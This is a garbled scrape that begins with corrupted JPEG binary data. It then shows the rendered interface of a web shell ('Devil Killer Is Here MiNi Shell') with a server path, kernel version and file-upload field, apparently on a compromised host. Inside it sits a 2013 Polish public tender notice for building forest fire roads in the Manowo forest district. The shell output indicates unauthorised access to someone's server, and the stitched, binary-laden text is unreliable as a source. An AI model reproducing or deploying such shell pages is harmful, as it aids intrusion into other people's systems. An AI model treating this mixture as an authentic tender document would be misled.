JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130405/51237-N-2013.html

<p class="kh_header"><b>Manowo: 1. Budowa drogi leśnej pożarowej nr ewid.5,3,4 na długości łącznej 10,5km położonej w obrębie ewidencyjnym Wyszewo, Wiewiórowo, Nacław, Kościernica - gminy Manowo i Polanów.
2. Budowa drogi leśnej pożarowej nr ewid.2 na długości łącznej 7,7km położonej w obrębie ewidencyjnym Wyszewo, Wiewiórowo, Karsinka, Rekowo - gminy Manowo i Polanów.</b><br>
<b>Numer ogłoszenia: 51237 - 2013; data zamieszczenia: 05.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Manowo , Manowo 54, 76-015 Manowo, tel. 094 3183291, faks 094 3183281.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa PGL Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. Budowa drogi leśnej pożarowej nr ewid.5,3,4 na długości łącznej 10,5km położonej w obrębie ewidencyjnym Wyszewo, Wiewiórowo, Nacław, Kościernica - gminy Manowo i Polanów.
2. Budowa drogi leśnej pożarowej nr ewid.2 na długości łącznej 7,7km położonej w obrębie ewidencyjnym Wyszewo, Wiewiórowo, Karsinka, Rekowo - gminy Manowo i Polanów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia i zakres prac objęty postępowaniem:
CZĘŚĆ I-wsza - droga nr ewid.5,3,4 o długości łącznej 10,5km.
Adres obiektu:
działki nr 210/3, 236/3, 242/1, 264/1, 269/9, 286/1, 287, 288/1, 289/1, 290/6,
291/1, 292/1, 293/5, obr. Wyszewo, działki nr 139/5, 140, 158/3,
159/3, 160/3, 161, 189/1, 190/1, 209, 235, obr. Wiewiórowo,
gm. Manowo;
działka nr 88, obr. Nacław, działki nr 68, 89/1, 90/1, 115/1, 116/1, 117/1,118, 
obr. Kościernica, gm. Polanów;
pow. koszaliński, woj. Zachodniopomorskie
ZAKRES PRAC: 
Zakres opracowania
Niniejsze opracowanie obejmuje wykonanie budowy drogi leśnej pożarowej nr ewidencyjny 5, 3, 4 na długości łącznej 10,5 km położonej w obrębie ewidencyjnym Wyszewo, Wiewiórowo, Nacław, Kościernica, gminy Manowo, Polanów - wg projektu.
Stan istniejący
Teren opracowania zlokalizowany jest na obszarze Nadleśnictwa Manowo w obrębie
geodezyjnym Wyszewo, Wiewiórowo w gminie Manowo oraz w obrębie Nacław, Kościernica w gminie Polanów. Droga leśna pożarowa nr 5 ujęta w dokumentacji ma swój początek w miejscowości Wyszewo - km 0+000, a koniec w km 6+530,13. W km 6+530,13 swój wspólny bieg rozpoczyna droga nr 3 i 4, aż do km 7+438,87. Od km 7+438,87 do końca opracowania czyli km 10+493,20 swój bieg posiada droga nr 4. W km 10+501,48 droga pożarowa nr 4 posiada zjazd na drogę wojewódzką nr 206, który nie jest objęty przebudową w ramach niniejszego opracowania. 
Przedmiotowe drogi pożarowe znajdują się bezpośrednio w lesie, posiadają nawierzchnię z żużla, gruntową oraz z brukowca.
Stan utrzymania nawierzchni jest różny. Nawierzchnia z żużla jest utrzymana w stanie
dobrym. Nawierzchnia gruntowa jest utrzymana w stanie dobrym (droga nr 5, 4) oraz złym (wspólny przebieg drogi nr 3 i 4). Nawierzchnia z brukowca jest utrzymana w stanie dobrym.
Nawierzchnie z żużla oraz gruntowe posiadają zbyt małe spadki poprzeczne oraz brak
ściętych poboczy przez co nie mają ujścia wody opadowe. Nawierzchnie gruntowe (wspólny przebieg drogi nr 3 i 4) posiadają liczne koleiny oraz są porośnięte bujnymi trawami. Drogi prowadzone w wykopie posiadają zbyt rzadko rowy odwadniające. Na skutek zalegania wód opadowych oraz napływu wód z przyległych skarp, następuje postępująca degradacja stanu nawierzchni. W porze mokrej droga o nawierzchni gruntowej (wspólny przebieg drogi nr 3 i 4) jest odcinkowo nieprzejezdna dla pojazdów samochodów osobowych.
Drogi o wszystkich rodzajach nawierzchni nie posiadają uformowanego typowego korpusu drogowego w postaci spadków daszkowych nawierzchni, obustronnych poboczy oraz w razie potrzeby rowów odwadniających. Szerokość jezdni jest często nienormatywna, tj. poniżej 3,5 m wolnej szerokości, na łukach poziomych nie występują poszerzenia, brak wystarczającej ilości mijanek oraz zbyt małe promienie łuków wyokrąglających na zjazdach.
Przebieg trasy należy miejscami wyprostować z uwagi na jej niepotrzebną krętość.
W km 0+413 oraz 9+001 występują istniejące przepusty betonowe, których stan jest
zadowalający i nie przewiduje się konieczności ich przebudowy.
Na terenie inwestycji występują urządzenia infrastruktury technicznej w postaci
przewodów rurowych przepustów.
Rzędne wysokościowe istniejącego terenu zawierają się w zakresie od 45 do 100 m
n.p.m. 
Stan projektowany
Zgodnie z założeniami Inwestora projektuje się wykonanie budowy drogi
leśnej pożarowej o łącznej długości 10,5 km o następujących parametrach:
- prędkość projektowa 30 km na godz.,
- jezdnia jednopasowa o szerokości 3,5 m o spadku daszkowym i=4procent,
- obustronne pobocza o szerokości po 0,75 m o spadku i=6 procent,
- skarpy nasypu o pochyleniu 1:1,5 m lub rowy odwadniająco-odparowujące trójkątne
o głębokości minimum 0,5 m, skarpy wewnętrzne rowu o pochyleniu 1:1,5, skarpy
zewnętrzne rowu o pochyleniu 1:1,
Na łukach poziomych o wartości promienia R mniejsze od 250 m projektuje się poszerzenie jezdni
od 0,25 m do 1,0 m. Dla łuków poziomych o wartości promienia Rwiększe od150 m projektuje się
pochylenie poprzeczne jezdni jednostronne o wartości od i=4procent do i=5procent . Zmiany pochylenia poprzecznego jezdni oraz szerokości (dla poszerzeń) należy dokonywać na prostych przejściowych o długości 15 m. Pochylenie poprzeczne poboczy na odcinkach
krzywoliniowych o pochyleniu jezdni innym niż na odcinku prostym powinno wynosić:
- 6procent jeżeli jest to pobocze po wewnętrznej stronie łuku,
- tyle co pochylenie jezdni - jeżeli jest to pobocze po zewnętrznej stronie łuku.
W odstępach do 300 m oraz na wzniesieniach należy lokalizować dwa rodzaje
mijanek, pierwszy o długości 23 m i szerokości 3 m, drugi o długości 50 m i szerokości 5 m, o skosach wjazdowych i wyjazdowych 1:5 oraz spadku poprzecznym jak przyległej jezdni.
Dłuższe mijanki będą pełniły częściowo funkcję składnic drewna.
Zjazdy należy wykonywać o szerokości 3,5 m z obustronnymi poboczami o szerokości
po 0,75 m, krawędzie wyokrąglać łukami o wartości R=11 m (dla zjazdów na działki leśne), o wartości R=15 m (dla zjazdów na drogi pożarowe). W zależności od potrzeb wykonać należy rowy odwadniające o parametrach jak dla drogi pożarowej.
Niweleta jezdni będzie składać się z odcinków o stałym pochyleniu o wartości od
i=0,2procent do i=7,03procent, krzywych wypukłych od R=300 m do R=1000 m oraz krzywych wklęsłych od R=500 m do R=4000 m.
Na odcinkach od km 8+896 do km 8+969, od km 9+051,5 do km 9+148,5 oraz od km
9+993,5 do km 10+412,5 należy dostosować niweletę projektowanej jezdni do niwelety
istniejącej nawierzchni z brukowca, którą należy oczyścić. Projektowaną nawierzchnię
z kruszywa należy dobudować na zasadzie poszerzenia do istniejącej nawierzchni
z brukowca, która ma pozostać w kształcie i wysokości jak w terenie. Spadki podłużne oraz poprzeczne przedstawione na projekcie zagospodarowania terenu oraz profilu podłużnego dla wymienionych powyżej trzech odcinków drogi należy przyjąć jako orientacyjne, a nie wiążące dla realizacji budowy.
Konstrukcja nawierzchni
Dla potrzeb dokumentacji geotechnicznej wykonano 22 otwory badawcze na obszarze
objętym opracowaniem. Z opracowania wyłączono otwory od nr 14 do 22, znajdujące się
poza przedmiotowymi drogami leśnymi nr 5, 3, 4.
W otworach nr 1-7, 9, 11, 13 w warstwie wierzchniej stwierdzono występowanie nasypu
budowlanego w postaci żużla, gruzu o miąższości od 0,05 do 0,4 m. W otworze nr 8, nasypu budowlanego w postaci piasku średniego z domieszką kamieni o miąższości 0,05 m.
Natomiast w otworach nr 10, 12, gleby o miąższości od 0,3 do 0,5 m.
Poniżej wierzchniej warstwy w otworach nr 1, 3-13 zalegają grunty w postaci piasków
drobnych, średnich, grubych z domieszką kamienia i żwiru o miąższości warstwy od 1,8 do 2,1 m. W otworze nr 2 zalegają piaski pylaste o miąższości 2,4 m.
Swobodne zwierciadło wody gruntowej nawiercono w otworze nr 1 na głębokości 2,0 m oraz w otworze nr 12 na głębokości 1,1 m.
Karpinę powstałą w wyniku karczowania istniejącego poszycia leśnego oraz
wykarczowane pnie drzew wraz z korzeniami należy złożyć na odkład w miejscu wskazanym przez Inwestora celem naturalnego rozkładu i uzyskania próchnicy.
Pod projektowaną nawierzchnią jezdni, zjazdów i mijanek należy usunąć istniejące
grunty organiczne na głębokość korytowania, do głębokości zalegania gruntów nośnych.
Podłoże gruntowe po korytowaniu należy wyprofilować i zagęścić do Is większe równe1,00. W przypadku niemożności uzyskania Iswieksze równe1,00, grunt należy wymienić na nośny - rumosze niegliniaste, żwiry, pospółki, piaski grubo-, średnio- i drobnoziarniste, żużle nie rozpadowe.
Do wykonania nasypów pod nawierzchniami utwardzonymi należy wykorzystywać tylko grunt nośny. Pod nasypy terenów zielonych można użyć dowolny grunt z wykopu.
Do zaprojektowania konstrukcji nawierzchni przyjęto obciążenie ruchem jak dla KR1.
Zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia
02.03.1999r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U. nr 43 poz. 430 z dnia 14.05.1999r) przyjęto konstrukcję jezdni, mijanek oraz zjazdów indywidualnie:
- warstwa ścieralna z kruszywa łamanego stabilizowanego mechanicznie
grubości 9 cm,
- podbudowa zasadnicza z pospółki grubości 20 cm lub  dopuszcza się zastosowanie podbudowy z destruktu gruzowego - betonowo-ceglanego, spełniającego warunki nośności, jako materiału równoważnego  
- podłoże nośne zagęszczone do Is większe równe1,00,
grubość razem: 29 cm.
Zgodnie z tabelą robót ziemnych grunt wykopu to 13961 m3, a grunt nasypu to
9512 m3. Przyjęto iż 30% gruntu z wykopu, tj. 13961X0,30=4189 m3 to grunt organiczny nie nadający się do wykorzystania dla wykonania nasypów pod nawierzchniami utwardzonymi.
Grunt nośny potrzebny do wykonania nasypów należy pozyskać z wykopu. Nadmiar gruntu z wykopu należy rozplantować na przyległy teren i nie wywozić poza teren inwestycji. Miejsce wywozu uzgodnić z miejscowym leśniczym.
Odwodnienie
Wody opadowe z nawierzchni jezdni, mijanek, zjazdów oraz poboczy będą
odprowadzane na przyległy teren zielony oraz do rowów odwadniająco-odparowujących
trójkątnych o głębokości minimum 0,5 m i nachyleniu skarp wewnętrznych 1:1,5, zaś
zewnętrznych 1:1. W miejscach zakończeń rowów, gdy ze względu na ukształtowanie terenu nie ma możliwości wypuszczenia wód z rowu na przyległy teren, należy wykonać doły chłonne - odparowujące.
Zestawienie projektowanych nawierzchni drogi nr ewid. 5,3,4.
- Długość 10,5 km
- Nawierzchnia jezdni, mijanek, zjazdów, o nawierzchni z kruszywa 55443 m2
- Pobocza gruntowe jako zieleń 17433 m2 

CZĘŚĆ II-GA
Droga nr ewid.2 o łącznej długości 7,7km

Adres obiektu:
działka nr 264/1, obr. Wyszewo, działki nr 227/4, 228/3, 229/3, 258, 259,
260, 261, 262, 263, obr. Wiewiórowo, gm. Manowo;
działka nr 257, obr. Karsinka, działki nr 150/4, 151, 152, 181, 182, 200, 201,
225, 226, 227/2, obr. Rekowo, gm. Polanów;
pow. koszaliński, woj. Zachodniopomorskie 
Zakres opracowania
Niniejsze opracowanie obejmuje wykonanie budowy drogi leśnej pożarowej nr ewidencyjny 2 na długości łącznej 7,7 km położonej w obrębie ewidencyjnym Wyszewo, Wiewiórowo, Karsinka, Rekowo, gminy Manowo, Polanów.
Stan istniejący
Teren opracowania zlokalizowany jest na obszarze Nadleśnictwa Manowo w obrębie
geodezyjnym Wyszewo, Wiewiórowo w gminie Manowo oraz w obrębie Karsinka, Rekowo w gminie Polanów. Droga leśna pożarowa nr 2 ujęta w dokumentacji ma swój początek na skrzyżowaniu z drogą pożarową nr 5 - km 0+000, a koniec w km 7+749,17. W km 7+752,92 posiada zjazd na drogę pożarową nr 1. Przedmiotowa droga pożarowa nr 2 znajduje się bezpośrednio w lesie, posiada nawierzchnię z żużla oraz gruntową.
Stan utrzymania nawierzchni jest przeciętny. Nawierzchnia z żużla oraz gruntowa posiadają zbyt małe spadki poprzeczne oraz brak ściętych poboczy przez co nie mają ujścia wody opadowe. Droga prowadzona w wykopie posiada zbyt rzadko rowy odwadniające. Na skutek zalegania wód opadowych oraz napływu wód z przyległych skarp, następuje postępująca degradacja stanu nawierzchni.
Droga nie posiada uformowanego typowego korpusu drogowego w postaci spadków
daszkowych nawierzchni, obustronnych poboczy oraz w razie potrzeby rowów
odwadniających. Szerokość jezdni jest często nienormatywna, tj. poniżej 3,5 m wolnej
szerokości, na łukach poziomych nie występują poszerzenia, brak wystarczającej ilości
mijanek oraz zbyt małe promienie łuków wyokrąglających na zjazdach.
Przebieg trasy należy miejscami wyprostować z uwagi na jej niepotrzebną krętość.
W km 4+907 występuje istniejący przepust betonowy, którego stan jest zadowalający i nie
przewiduje się konieczności jego przebudowy.
Na terenie inwestycji występują urządzenia infrastruktury technicznej w postaci
przewodów rurowych przepustu.
Rzędne wysokościowe istniejącego terenu zawierają się w zakresie od 84 do 99 m
n.p.m.
Stan projektowany
Zgodnie z założeniami Inwestora projektuje się wykonanie budowy drogi
leśnej pożarowej o łącznej długości 7,7 km o następujących parametrach:
- prędkość projektowa 30 km/godz.,
- jezdnia jednopasowa o szerokości 3,5 m o spadku daszkowym i=4%,
- obustronne pobocza o szerokości po 0,75 m o spadku i=6%,
- skarpy nasypu o pochyleniu 1:1,5 m lub rowy odwadniająco-odparowujące trójkątne
o głębokości minimum 0,5 m, skarpy wewnętrzne rowu o pochyleniu 1:1,5, skarpy
zewnętrzne rowu o pochyleniu 1:1,
Na łukach poziomych o wartości promienia R mniejsze od 250 m projektuje się poszerzenie jezdni
od 0,25 m do 0,5 m. Dla łuków poziomych o wartości promienia R mniejsze od150 m projektuje się pochylenie poprzeczne jezdni jednostronne o wartości od i=3 procent do i=4procent . Zmiany pochylenia
poprzecznego jezdni oraz szerokości (dla poszerzeń) należy dokonywać na prostych
przejściowych o długości 15 m. Pochylenie poprzeczne poboczy na odcinkach
krzywoliniowych o pochyleniu jezdni innym niż na odcinku prostym powinno wynosić:
- 6procent jeżeli jest to pobocze po wewnętrznej stronie łuku,
- tyle co pochylenie jezdni - jeżeli jest to pobocze po zewnętrznej stronie łuku.
W odstępach do 300 m oraz na wzniesieniach należy lokalizować dwa rodzaje
mijanek, pierwszy o długości 23 m i szerokości 3 m, drugi o długości 50 m i szerokości 5 m, o skosach wjazdowych i wyjazdowych 1:5 oraz spadku poprzecznym jak przyległej jezdni.
Dłuższe mijanki będą pełniły częściowo funkcję składnic drewna.
Zjazdy należy wykonywać o szerokości 3,5 m z obustronnymi poboczami o szerokości
po 0,75 m, krawędzie wyokrąglać łukami o wartości R=11 m (dla zjazdów na działki leśne),
o wartości R=15 m (dla zjazdów na drogi pożarowe). W zależności od potrzeb wykonać
należy rowy odwadniające o parametrach jak dla drogi pożarowej.
Niweleta jezdni będzie składać się z odcinków o stałym pochyleniu o wartości od
i=0,2procent do i=5,35procent, krzywych wypukłych od R=600 m do R=4000 m oraz krzywych wklęsłych od R=500 m do R=2500 m.
Konstrukcja nawierzchni

Dla potrzeb dokumentacji geotechnicznej wykonano 22 otwory badawcze na obszarze
objętym opracowaniem. Z opracowania wyłączono otwory od nr 1 do 13, znajdujące się poza
przedmiotową drogą leśną nr 2.
W otworach nr 14-16, 18-22 w warstwie wierzchniej stwierdzono występowanie nasypu
budowlanego w postaci żużla o miąższości od 0,05 do 0,2 m. W otworze nr 17, gleby
o miąższości 0,2 m.
Poniżej wierzchniej warstwy w otworach nr 15 i 16 zalegają grunty organiczne w postaci
piasku drobnego i humusu o miąższości warstwy 0,6 m.
W niższych warstwach stwierdzono występowanie piasków drobnych, średnich oraz grubych do głębokości 2,5 m.
Swobodne zwierciadło wody gruntowej nawiercono w otworze nr 15 na głębokości 1,2 m, otworze nr 16 na głębokości 2,1 m, otworze nr 17 na głębokości 2,4 m oraz w otworze nr 20 na głębokości 1,8 m.

Karpinę powstałą w wyniku karczowania istniejącego poszycia leśnego oraz
wykarczowane pnie drzew wraz z korzeniami należy złożyć na odkład w miejscu wskazanym
przez Inwestora celem naturalnego rozkładu i uzyskania próchnicy.
Pod projektowaną nawierzchnią jezdni, zjazdów i mijanek należy usunąć istniejące
grunty organiczne na głębokość korytowania, do głębokości zalegania gruntów nośnych.
Podłoże gruntowe po korytowaniu należy wyprofilować i zagęścić do Is większe równe 1,00. W przypadku niemożności uzyskania Iswiększe równe1,00, grunt należy wymienić na nośny - rumosze niegliniaste, żwiry, pospółki, piaski grubo-, średnio- i drobnoziarniste, żużle nie rozpadowe.
Do wykonania nasypów pod nawierzchniami utwardzonymi należy wykorzystywać tylko grunt nośny.
Pod nasypy terenów zielonych można użyć dowolny grunt z wykopu.
Do zaprojektowania konstrukcji nawierzchni przyjęto obciążenie ruchem jak dla KR1.
Zgodnie z Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia
02.03.1999r w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U. nr 43 poz. 430 z dnia 14.05.1999r) przyjęto konstrukcję jezdni, mijanek oraz zjazdów indywidualnie:
- warstwa ścieralna z kruszywa łamanego stabilizowanego mechanicznie
grubości 9 cm,
- podbudowa zasadnicza z pospółki grubości 20 cm, lub  dopuszcza się zastosowanie podbudowy z destruktu gruzowego - betonowo-ceglanego, spełniającego warunki nośności, jako materiału równoważnego  
- podłoże nośne zagęszczone do Is wieksze równe1,00,
grubość razem: 29 cm.
Zgodnie z tabelą robót ziemnych grunt wykopu to 7940 m3, a grunt nasypu to
5112 m3. Przyjęto iż 25procent gruntu z wykopu, tj. 7940x0,30=2382 m3 to grunt organiczny nie nadający się do wykorzystania dla wykonania nasypów pod nawierzchniami utwardzonymi.
Grunt nośny potrzebny do wykonania nasypów należy pozyskać z wykopu. Nadmiar gruntu z wykopu należy rozplantować na przyległy teren i nie wywozić poza teren inwestycji.
Odwodnienie
Wody opadowe z nawierzchni jezdni, mijanek, zjazdów oraz poboczy będą
odprowadzane na przyległy teren zielony oraz do rowów odwadniająco-odparowujących
trójkątnych o głębokości minimum 0,5 m i nachyleniu skarp wewnętrznych 1:1,5, zaś
zewnętrznych 1:1. W miejscach zakończeń rowów, gdy ze względu na ukształtowanie terenu nie ma możliwości wypuszczenia wód z rowu na przyległy teren, należy wykonać doły chłonne odparowujące.
Zestawienie projektowanych nawierzchni
- Długość drogi 7,7km
- Nawierzchnia jezdni, mijanek, zjazdów, o nawierzchni z kruszywa 42283 m2
- Pobocza gruntowe jako zieleń 12205 m2.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia polegające na powtórzeniu czynności związanych z realizacją budów o wysokości do 50% zamówień podstawowych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.31-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> tak.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wyznacza się wpłatę wadium:
Część I-wsza - 70 000 PLN
Część II-ga - 53 000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia, tj., co najmniej jedną osobą uprawnioną do kierowania robotami budowlanymi w specjalności: drogowej .
 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia (załącznik nr 3 oraz nr 5).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia (załącznik nr 5).
Wykonawca winien wykazać, przynajmniej dwie roboty budowlane drogowe z warstwą ścieralną z kruszywa łamanego stabilizowanego mechanicznie o wartości, co najmniej 800 tys. zł netto każda, na każdą z dwóch części zamówienia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Jeżeli Wykonawca będzie składał oferty na dwie części zamówienia, wystarczające jest doświadczenie w dwóch robotach o wartości jak wyżej. Jeżeli Wykonawca składał będzie ofertę na tylko jedną z dwóch części zamówienia, warunek jest bez zmian.  Muszą to być drogi o podobnej konstrukcji. Złożenie referencji z wykonywania dróg o nawierzchni ścieralnej asfaltowej, betonowej, z kostki brukowanej   będzie traktowane przez zamawiającego, jako nie spełnianie warunków udziału w postępowaniu. (załącznik nr 2).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia (załącznik nr 5).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia, tj., co najmniej jedną osobą uprawnioną do kierowania robotami budowlanymi w specjalności: 
drogowej .
 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia (załącznik nr 3 oraz nr 5).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
